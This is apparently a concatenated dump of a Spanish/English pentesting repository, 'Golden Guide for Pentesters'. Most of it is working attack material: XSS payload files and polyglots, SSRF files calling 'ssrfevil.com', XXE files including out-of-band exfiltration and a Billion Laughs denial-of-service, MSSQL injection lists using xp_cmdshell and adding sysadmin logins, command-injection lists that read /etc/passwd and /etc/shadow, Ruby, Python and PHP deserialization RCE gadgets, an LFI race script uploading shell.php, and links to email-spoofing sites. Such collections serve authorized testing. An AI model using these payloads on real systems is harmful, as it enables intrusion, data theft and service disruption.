├── Web Application ├── File Upload │ └── README.md ├── XSS Injection │ ├── Files PoC │ │ ├── "> │ │ ├── '> │ │ ├── xss.cer │ │ ├── xss.htm │ │ ├── xss.hxt │ │ ├── ">: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/'>: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.cer: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.htm: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.hxt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/">]]> 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Golden Guide for Pentesters. 2 | 3 | * This guide will become obsolete. New version 2025 *coming soon*! 
4 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/SVG_XSS4.svg: -------------------------------------------------------------------------------- 1 | <![CDATA[]]> 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xml.xsd: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.dtd: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.mno: -------------------------------------------------------------------------------- 1 | alert(1337) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.rdf: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.svgz: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.vml: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.wsdl: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xht: 
-------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xhtml: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xsd: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xsf: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xsl: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xslt: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.html.demo: -------------------------------------------------------------------------------- 1 | alert(1) 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.url.url: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/SVG_XSS3.svg: -------------------------------------------------------------------------------- 1 | </foreignObject><script>alert(2)</script> 2 | 
-------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_ffmpeg.avi: -------------------------------------------------------------------------------- 1 | #EXTM3U 2 | #EXT-X-MEDIA-SEQUENCE:0 3 | #EXTINF:1.0 4 | http://ssrfevil.com 5 | #EXT-X-ENDLIST -------------------------------------------------------------------------------- /Web Application/Fuzzing/g0ld3n-ok.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/Fuzzing/g0ld3n-ok.txt -------------------------------------------------------------------------------- /Web Application/Fuzzing/fdb_1.0.tar.bz2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/Fuzzing/fdb_1.0.tar.bz2 -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/xss.swf -------------------------------------------------------------------------------- /Web Application/XXE/Files/Classic XXE B64 Encoded.xml: -------------------------------------------------------------------------------- 1 | %init; ]> 2 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/SWF_XSS.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/SWF_XSS.swf -------------------------------------------------------------------------------- /Web Application/SQL 
Injection/Images/PostgreSQL_cmd_exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/SQL Injection/Images/PostgreSQL_cmd_exec.png -------------------------------------------------------------------------------- /Web Application/SQL Injection/Images/Unicode_SQL_injection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/SQL Injection/Images/Unicode_SQL_injection.png -------------------------------------------------------------------------------- /Web Application/SQL Injection/Images/wildcard_underscore.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/SQL Injection/Images/wildcard_underscore.jpg -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/InsecureFlashFile.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/InsecureFlashFile.swf -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/onclick-xss-ecs.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/onclick-xss-ecs.jpeg -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/payload_text_xss.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/payload_text_xss.png -------------------------------------------------------------------------------- /Web Application/XXE/Files/Classic XXE.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | ]> 6 | &file; -------------------------------------------------------------------------------- /Web Application/XXE/Files/Classic XXE - etc passwd.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | ]> 6 | &file; 7 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/payload_in_all_known_metadata.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/payload_in_all_known_metadata.jpg -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/payload_in_all_known_metadata.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/payload_in_all_known_metadata.png -------------------------------------------------------------------------------- /Web Application/SSRF/Images/SSRF_expect.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Web Application/SSRF/Images/SSRF_url.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_svg_use.svg: 
-------------------------------------------------------------------------------- 1 | 3 | 4 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/payload_in_all_known_exif_corrupted.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/payload_in_all_known_exif_corrupted.jpg -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/payload_in_all_known_exif_corrupted.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/payload_in_all_known_exif_corrupted.png -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss_comment_exif_metadata_double_quote.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/xss_comment_exif_metadata_double_quote.png -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss_comment_exif_metadata_single_quote.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xCGonzalo/Golden-Guide-for-Pentesting/HEAD/Web Application/XSS Injection/Files PoC/xss_comment_exif_metadata_single_quote.png -------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_svg_image.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | 
-------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_svg_css_import.svg: -------------------------------------------------------------------------------- 1 | 2 | 5 | 7 | -------------------------------------------------------------------------------- /Web Application/README.md: -------------------------------------------------------------------------------- 1 | This is a Web Security Guide for Pentesting, BugBounty and CTFs. 2 | 3 | 4 | 5 | *Picture from Bug Bounty Playbook v2* 6 | -------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_svg_css_xmlstylesheet.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | -------------------------------------------------------------------------------- /Web Application/Access Control/Files/ExtensionsBypass.md: -------------------------------------------------------------------------------- 1 | ? 2 | ?? 
3 | & 4 | # 5 | % 6 | %20 7 | %09 8 | / 9 | /..;/ 10 | ../ 11 | ..%2f 12 | ..;/ 13 | ../ 14 | \..\.\ 15 | .././ 16 | ..%00/ 17 | ..%0d/ 18 | ..%5c 19 | ..\ 20 | ..%ff/ 21 | %2e%2e%2f 22 | .%2e/ 23 | %3f 24 | %26 25 | %23 26 | .json 27 | -------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_iframe.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Web Application/Missing Insufficient SPF/README.md: -------------------------------------------------------------------------------- 1 | # Missing Insufficient SPF 2 | 3 | Check whether the domain's SPF record is missing or misconfigured 4 | 5 | ``` 6 | https://www.kitterman.com/spf/validate.html 7 | https://mxtoolbox.com/ 8 | ``` 9 | 10 | Create fake mail 11 | 12 | ``` 13 | https://emkei.cz/ 14 | ``` 15 | ``` 16 | https://www.spoofbox.com/ 17 | ``` 18 | -------------------------------------------------------------------------------- /Web Application/SSRF/Images/ssrf_svg_css_link.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | 6 | -------------------------------------------------------------------------------- /Web Application/XXE/Files/avatarImage_DisplayEtcHostnameFile.svg: -------------------------------------------------------------------------------- 1 | 2 | ]> 3 | 4 | &xxe; 5 | -------------------------------------------------------------------------------- /Web Application/XXE/Files/Deny Of Service - Billion Laugh Attack.txt: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | 6 | 7 | ]> 8 | &a4; -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/Polyglots.txt: -------------------------------------------------------------------------------- 1 | SLEEP(1) /*‘ or SLEEP(1) or 
‘“ or SLEEP(1) or “*/ 2 | SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample -------------------------------------------------------------------------------- /Web Application/XXE/Files/XXE PHP Wrapper.xml: -------------------------------------------------------------------------------- 1 | ]> 2 | 3 | 4 | Jean &xxe; Dupont 5 | 00 11 22 33 44 6 |
42 rue du CTF
7 | 75000 8 | Paris 9 |
10 |
11 | -------------------------------------------------------------------------------- /Web Application/XXE/Files/XXE OOB Attack (Yunusov, 2013).xml: -------------------------------------------------------------------------------- 1 | XXE OOB Attack (Yunusov, 2013) 2 | 3 | 4 | &send; 5 | 6 | File stored on http://publicServer.com/parameterEntity_oob.dtd 7 | 8 | "> 9 | %all; -------------------------------------------------------------------------------- /Web Application/Subdomain Takeover/README.md: -------------------------------------------------------------------------------- 1 | ## Summary 2 | 3 | * [Formas de Explotación](#formas-de-explotacion) 4 | 5 | ## Formas de Explotación: 6 | 7 | ``` 8 | https://github.com/EdOverflow/can-i-take-over-xyz 9 | ``` 10 | 11 | *Para ver un ejemplo claro, revise la página 40-44 del libro "Bug Bounty Playbook v2":* 12 | 13 | 14 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/SVG_XSS.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 9 | 10 | -------------------------------------------------------------------------------- /Web Application/template.md: -------------------------------------------------------------------------------- 1 | # Vulnerability Title 2 | 3 | > Vulnerability description - reference 4 | 5 | ## Summary 6 | 7 | * [Something](#something) 8 | * [Subentry 1](#sub1) 9 | * [Subentry 2](#sub2) 10 | 11 | ## Tools 12 | 13 | - [Tool 1](https://example.com) 14 | - [Tool 2](https://example.com) 15 | 16 | ### Something1 17 | 18 | Quick explanation 19 | 20 | ```powershell 21 | Exploit 22 | ``` 23 | 24 | ### Something2 25 | 26 | Quick explanation 27 | 28 | ```powershell 29 | Exploit 30 | ``` 31 | ### References 32 | 33 | - [Link](https://example.com) 34 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Files PoC/xss.xml: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | alert(1) 5 | alert(2) 6 | 7 | 8 | confirm(document.domain)]]> 9 | 10 | 11 | Hello 12 | 13 | 14 | http://google.com 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Web Application/LFI and RFI/uploadlfi.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from builtins import range 3 | import itertools 4 | import requests 5 | import string 6 | import sys 7 | 8 | print('[+] Trying to win the race') 9 | f = {'file': open('shell.php', 'rb')} 10 | for _ in range(4096 * 4096): 11 | requests.post('http://target.com/index.php?c=index.php', f) 12 | 13 | 14 | print('[+] Bruteforcing the inclusion') 15 | for fname in itertools.combinations(string.ascii_letters + string.digits, 6): 16 | url = 'http://target.com/index.php?c=/tmp/php' + fname 17 | r = requests.get(url) 18 | if 'load average' in r.text: # Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system 4 | 5 | ## Summary 6 | 7 | * [Cassandra comment](#cassandra-comment) 8 | * [Cassandra - Login Bypass](#cassandra---login-bypass) 9 | * [Login Bypass 0](#login-bypass-0) 10 | * [Login Bypass 1](#login-bypass-1) 11 | * [References](#references) 12 | 13 | ## Cassandra comment 14 | 15 | ```sql 16 | /* Cassandra Comment */ 17 | ``` 18 | 19 | ## Cassandra - Login Bypass 20 | 21 | ### Login Bypass 0 22 | 23 | ```sql 24 | username: admin' ALLOW FILTERING; %00 25 | password: ANY 26 | ``` 27 | 28 | ### Login Bypass 1 29 | 30 | ```sql 31 | username: admin'/* 32 | password: */and pass>' 33 | ``` 34 | 35 | The injection would look like the following SQL query 36 | 37 | ```sql 38 | SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING; 39 | ``` 40 | -------------------------------------------------------------------------------- 
/Web Application/HTML Injection/README.md: -------------------------------------------------------------------------------- 1 | # HTML Injection 2 | 3 | HTML injection is a type of injection vulnerability that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. 4 | 5 | ## Summary 6 | - [Payloads](#payloads) 7 | 8 | 9 | 10 | ## Payloads 11 | 12 | ``` 13 | ">test 14 | 15 | ">test 16 | 17 | ">

test

18 | 19 | ">

TEST

20 | 21 |

TEST


Test2


22 | 23 | CLICKME 24 | 25 | "/>

test

26 | 27 | ">negrita 28 | ``` 29 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Intruder/xss_swf_fuzz.txt: -------------------------------------------------------------------------------- 1 | #getURL,javascript:alert(1)", 2 | #goto,javascript:alert(1)", 3 | ?javascript:alert(1)", 4 | ?alert(1)", 5 | ?getURL(javascript:alert(1))", 6 | ?asfunction:getURL,javascript:alert(1)//", 7 | ?getURL,javascript:alert(1)", 8 | ?goto,javascript:alert(1)", 9 | ?clickTAG=javascript:alert(1)", 10 | ?url=javascript:alert(1)", 11 | ?clickTAG=javascript:alert(1)&TargetAS=", 12 | ?TargetAS=javascript:alert(1)", 13 | ?skinName=asfunction:getURL,javascript:alert(1)//", 14 | ?baseurl=asfunction:getURL,javascript:alert(1)//", 15 | ?base=javascript:alert(0)", 16 | ?onend=javascript:alert(1)//", 17 | ?userDefined=');function someFunction(a){}alert(1)//", 18 | ?URI=javascript:alert(1)", 19 | ?callback=javascript:alert(1)", 20 | ?getURLValue=javascript:alert(1)", 21 | ?goto=javascript:alert(1)", 22 | ?pg=javascript:alert(1)", 23 | ?page=javascript:alert(1)" 24 | ?playerready=alert(document.cookie) -------------------------------------------------------------------------------- /Web Application/Broken Link Hijacking/README.md: -------------------------------------------------------------------------------- 1 | # Broken Link Hijacking 2 | 3 | ## Summary 4 | 5 | * [Exploitation](#exploitation) 6 | * [Check Online](#check-online) 7 | * [References](#references) 8 | 9 | ## Exploitation 10 | 11 | Encuentre y clickee sobre links que aparezcan en la aplicación objetivo (Por ejemplo, links hacia redes sociales u otros) 12 | 13 | Mientras hace esto, corra esta [herramienta](https://github.com/stevenvachon/broken-link-checker) para ayudarlo a encontrar enlaces externos rotos. 
14 | 15 | ``` 16 | blc -rof --filter-level 3 https://example.com/ 17 | ``` 18 | 19 | La salida en un caso de éxito se verá así: 20 | 21 | ``` 22 | ─BROKEN─ https://www.linkedin.com/company/ACME-inc-/ (HTTP_999) 23 | ``` 24 | 25 | Si, por ejemplo, algún enlace lo redirige a un link de LinkedIn que no exista (404 response), intente crear una cuenta en LinkedIn con el nombre del recurso externo llamado desde la aplicación víctima. 26 | 27 | ## Check Online 28 | 29 | https://brokenlinkcheck.com/ 30 | 31 | https://ahrefs.com/broken-link-checker 32 | 33 | ## References 34 | 35 | https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d 36 | -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/MSSQL_Fuzz.txt: -------------------------------------------------------------------------------- 1 | # You will need to customize/modify some of the values in the queries for best effect 2 | 3 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 4 | 'create user name identified by 'pass123' -- 5 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 6 | ' ; drop table temp -- 7 | 'exec sp_addlogin 'name' , 'password' -- 8 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 9 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 10 | ' grant connect to name; grant resource to name; -- 11 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 12 | ' or 1=1 -- 13 | ' union (select @@version) -- 14 | ' union (select NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, (select @@version)) -- 17 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 18 | ' union (select NULL, NULL, 
NULL, NULL, NULL, (select @@version)) -- -------------------------------------------------------------------------------- /Web Application/SQL Injection/Intruder/MSSQL_Enumeration.txt: -------------------------------------------------------------------------------- 1 | # ms-sqli info disclosure payload fuzzfile 2 | # replace regex with your fuzzer for best results 3 | # run wireshark or tcpdump, look for incoming smb or icmp packets from victim 4 | # might need to terminate payloads with ;-- 5 | 6 | select @@version;-- 7 | select @@servernamee;-- 8 | select @@microsoftversione;-- 9 | select * from master..sysserverse;-- 10 | select * from sysusers;-- 11 | exec master..xp_cmdshell 'ipconfig+/all';-- 12 | exec master..xp_cmdshell 'net+view';-- 13 | exec master..xp_cmdshell 'net+users';-- 14 | exec master..xp_cmdshell 'ping+';-- 15 | BACKUP database master to disks='\\\\backupdb.dat';-- 16 | create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp�'" select * from myfile"-- 17 | 18 | select @@version 19 | select @@servernamee 20 | select @@microsoftversione 21 | select * from master..sysserverse 22 | select * from sysusers 23 | exec master..xp_cmdshell 'ipconfig+/all' 24 | exec master..xp_cmdshell 'net+view' 25 | exec master..xp_cmdshell 'net+users' 26 | exec master..xp_cmdshell 'ping+' 27 | BACKUP database master to disks='\\\\backupdb.dat' 28 | create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp�'" select * from myfile"-- -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/Files/PHP-Serialization-RCE-exploit.php: -------------------------------------------------------------------------------- 1 | 33 | -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/Ruby.md: -------------------------------------------------------------------------------- 1 | # Ruby 
Deserialization 2 | 3 | ## Marshal.load 4 | 5 | Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5 6 | 7 | ```ruby 8 | for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done 9 | ``` 10 | 11 | ## Yaml.load 12 | 13 | Vulnerable code 14 | ```ruby 15 | require "yaml" 16 | YAML.load(File.read("p.yml")) 17 | ``` 18 | 19 | Exploitation code 20 | ```ruby 21 | --- !ruby/object:Gem::Requirement 22 | requirements: 23 | !ruby/object:Gem::DependencyList 24 | specs: 25 | - !ruby/object:Gem::Source::SpecificFile 26 | spec: &1 !ruby/object:Gem::StubSpecification 27 | loaded_from: "|id 1>&2" 28 | - !ruby/object:Gem::Source::SpecificFile 29 | spec: 30 | ``` 31 | 32 | 33 | ## References 34 | 35 | - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) 36 | - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) 37 | - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) 38 | -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/Files/Ruby-Universal-Gadget-Generate-Verify.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | class Gem::StubSpecification 4 | def initialize; end 5 | end 6 | 7 | 8 | stub_specification = Gem::StubSpecification.new 9 | 
stub_specification.instance_variable_set(:@loaded_from, "|") 10 | 11 | puts "STEP n" 12 | stub_specification.name rescue nil 13 | puts 14 | 15 | 16 | class Gem::Source::SpecificFile 17 | def initialize; end 18 | end 19 | 20 | specific_file = Gem::Source::SpecificFile.new 21 | specific_file.instance_variable_set(:@spec, stub_specification) 22 | 23 | other_specific_file = Gem::Source::SpecificFile.new 24 | 25 | puts "STEP n-1" 26 | specific_file <=> other_specific_file rescue nil 27 | puts 28 | 29 | 30 | $dependency_list= Gem::DependencyList.new 31 | $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file]) 32 | 33 | puts "STEP n-2" 34 | $dependency_list.each{} rescue nil 35 | puts 36 | 37 | 38 | class Gem::Requirement 39 | def marshal_dump 40 | [$dependency_list] 41 | end 42 | end 43 | 44 | payload = Marshal.dump(Gem::Requirement.new) 45 | 46 | puts "STEP n-3" 47 | Marshal.load(payload) rescue nil 48 | puts 49 | 50 | 51 | puts "VALIDATION (in fresh ruby process):" 52 | IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe| 53 | pipe.print payload 54 | pipe.close_write 55 | puts pipe.gets 56 | puts 57 | end 58 | 59 | puts "Payload (hex):" 60 | puts payload.unpack('H*')[0] 61 | puts 62 | 63 | 64 | require "base64" 65 | puts "Payload (Base64 encoded):" 66 | puts Base64.encode64(payload) 67 | -------------------------------------------------------------------------------- /Web Application/OS Command Injection/Intruder/command-execution-unix.txt: -------------------------------------------------------------------------------- 1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> 2 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> 3 | <!--#exec%20cmd="/usr/bin/id;--> 4 | <!--#exec%20cmd="/usr/bin/id;--> 5 | /index.html|id| 6 | ";id;" 7 | ';id;' 8 | ;id; 9 | ;id 10 | ;netstat -a; 11 | "|id|" 12 | '|id|' 13 | |id 14 | |/usr/bin/id 15 | |id| 16 | "|/usr/bin/id|" 17 | '|/usr/bin/id|' 18 | |/usr/bin/id| 19 | "||/usr/bin/id|" 20 | 
'||/usr/bin/id|' 21 | ||/usr/bin/id| 22 | |id; 23 | ||/usr/bin/id; 24 | ;id| 25 | ;|/usr/bin/id| 26 | "\n/bin/ls -al\n" 27 | '\n/bin/ls -al\n' 28 | \n/bin/ls -al\n 29 | \n/usr/bin/id\n 30 | \nid\n 31 | \n/usr/bin/id; 32 | \nid; 33 | \n/usr/bin/id| 34 | \nid| 35 | ;/usr/bin/id\n 36 | ;id\n 37 | |usr/bin/id\n 38 | |nid\n 39 | `id` 40 | `/usr/bin/id` 41 | a);id 42 | a;id 43 | a);id; 44 | a;id; 45 | a);id| 46 | a;id| 47 | a)|id 48 | a|id 49 | a)|id; 50 | a|id 51 | |/bin/ls -al 52 | a);/usr/bin/id 53 | a;/usr/bin/id 54 | a);/usr/bin/id; 55 | a;/usr/bin/id; 56 | a);/usr/bin/id| 57 | a;/usr/bin/id| 58 | a)|/usr/bin/id 59 | a|/usr/bin/id 60 | a)|/usr/bin/id; 61 | a|/usr/bin/id 62 | ;system('cat%20/etc/passwd') 63 | ;system('id') 64 | ;system('/usr/bin/id') 65 | %0Acat%20/etc/passwd 66 | %0A/usr/bin/id 67 | %0Aid 68 | %22%0A/usr/bin/id%0A%22 69 | %27%0A/usr/bin/id%0A%27 70 | %0A/usr/bin/id%0A 71 | %0Aid%0A 72 | "& ping -i 30 127.0.0.1 &" 73 | '& ping -i 30 127.0.0.1 &' 74 | & ping -i 30 127.0.0.1 & 75 | & ping -n 30 127.0.0.1 & 76 | %0a ping -i 30 127.0.0.1 %0a 77 | `ping 127.0.0.1` 78 | | id 79 | & id 80 | ; id 81 | %0a id %0a 82 | `id` 83 | $;/usr/bin/id 84 | -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/Python.md: -------------------------------------------------------------------------------- 1 | # Python Deserialization 2 | 3 | ## Pickle 4 | 5 | The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object. 
6 | 7 | ```python 8 | import cPickle 9 | from base64 import b64encode, b64decode 10 | 11 | class User: 12 | def __init__(self): 13 | self.username = "anonymous" 14 | self.password = "anonymous" 15 | self.rank = "guest" 16 | 17 | h = User() 18 | auth_token = b64encode(cPickle.dumps(h)) 19 | print("Your Auth Token : {}").format(auth_token) 20 | ``` 21 | 22 | The vulnerability is introduced when a token is loaded from an user input. 23 | 24 | ```python 25 | new_token = raw_input("New Auth Token : ") 26 | token = cPickle.loads(b64decode(new_token)) 27 | print "Welcome {}".format(token.username) 28 | ``` 29 | 30 | Python 2.7 documentation clearly states Pickle should never be used with untrusted sources. Let's create a malicious data that will execute arbitrary code on the server. 31 | 32 | > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. 33 | 34 | ```python 35 | import cPickle 36 | from base64 import b64encode, b64decode 37 | 38 | class Evil(object): 39 | def __reduce__(self): 40 | return (os.system,("whoami",)) 41 | 42 | e = Evil() 43 | evil_token = b64encode(cPickle.dumps(e)) 44 | print("Your Evil Token : {}").format(evil_token) 45 | ``` 46 | 47 | ## References 48 | 49 | * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) 50 | * [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) 51 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Intruder/PolyglotsXSS.txt: -------------------------------------------------------------------------------- 1 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e 2 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> 3 | “ 
